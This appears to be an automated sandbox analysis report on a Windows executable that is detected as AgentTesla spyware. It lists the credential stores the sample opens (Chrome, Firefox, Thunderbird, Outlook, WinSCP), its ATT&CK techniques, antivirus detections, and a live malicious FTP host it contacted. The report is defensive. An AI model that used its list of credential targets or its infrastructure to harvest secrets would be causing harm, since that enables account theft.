          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Users\user\Desktop\Q4YODvoYjL.exe VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 1_2_00D7F610 GetUserNameW,

          Stealing of Sensitive Information

          barindex
          Yara detected AgentTesla
          Source: Yara matchFile source: 00000001.00000002.563968449.0000000002A3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Q4YODvoYjL.exe PID: 352, type: MEMORYSTR
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
          Source: Yara matchFile source: 00000001.00000002.563968449.0000000002A3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Q4YODvoYjL.exe PID: 352, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected AgentTesla
          Source: Yara matchFile source: 00000001.00000002.563968449.0000000002A3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Q4YODvoYjL.exe PID: 352, type: MEMORYSTR

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts211
          Windows Management Instrumentation          		Path Interception111
          Process Injection          		1
          Masquerading          		1
          OS Credential Dumping          		111
          Security Software Discovery          		Remote Services1
          Email Collection          		1
          Exfiltration Over Alternative Protocol          		11
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Disable or Modify Tools          		1
          Credentials in Registry          		131
          Virtualization/Sandbox Evasion          		Remote Desktop Protocol1
          Archive Collected Data          		Exfiltration Over Bluetooth1
          Non-Standard Port          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)131
          Virtualization/Sandbox Evasion          		Security Account Manager1
          Application Window Discovery          		SMB/Windows Admin Shares1
          Data from Local System          		Automated Exfiltration1
          Ingress Tool Transfer          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
          Process Injection          		NTDS1
          Account Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer2
          Non-Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
          Obfuscated Files or Information          		LSA Secrets1
          System Owner/User Discovery          		SSHKeyloggingData Transfer Size Limits23
          Application Layer Protocol          		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common2
          Software Packing          		Cached Domain Credentials1
          Remote System Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
          System Network Configuration Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem114
          System Information Discovery          		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Q4YODvoYjL.exe31%ReversingLabsWin32.Trojan.Generic
          Q4YODvoYjL.exe38%VirustotalBrowse
          Q4YODvoYjL.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.Q4YODvoYjL.exe.400000.0.unpack100%AviraHEUR/AGEN.1203035Download File

          Domains

          SourceDetectionScannerLabelLink
          ftp.valvulasthermovalve.cl13%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://ftp.valvulasthermovalve.cl100%URL Reputationphishing
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          api4.ipify.org
          		173.231.16.76
          		truefalse
            		high
            ftp.valvulasthermovalve.cl
            		190.107.177.239
            		truetrueunknown
            api.ipify.org
            		unknown
            		unknownfalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://api.ipify.org/false
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.apache.org/licenses/LICENSE-2.0Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://www.fontbureau.comQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://www.fontbureau.com/designersGQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://ftp.valvulasthermovalve.clQ4YODvoYjL.exe, 00000001.00000002.563968449.0000000002A6C000.00000004.00000800.00020000.00000000.sdmp, Q4YODvoYjL.exe, 00000001.00000002.563968449.0000000002A3C000.00000004.00000800.00020000.00000000.sdmptrue
                      • URL Reputation: phishing
                      		unknown
                      http://www.fontbureau.com/designers/?Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.founder.com.cn/cn/bTheQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designers?Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.tiro.comQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designersQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.goodfont.co.krQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.carterandcone.comlQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.sajatypeworks.comQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.typography.netDQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers/cabarga.htmlNQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.founder.com.cn/cn/cTheQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.galapagosdesign.com/staff/dennis.htmQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://api.ipify.orgQ4YODvoYjL.exe, 00000001.00000002.563968449.00000000029F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://fontfabrik.comQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
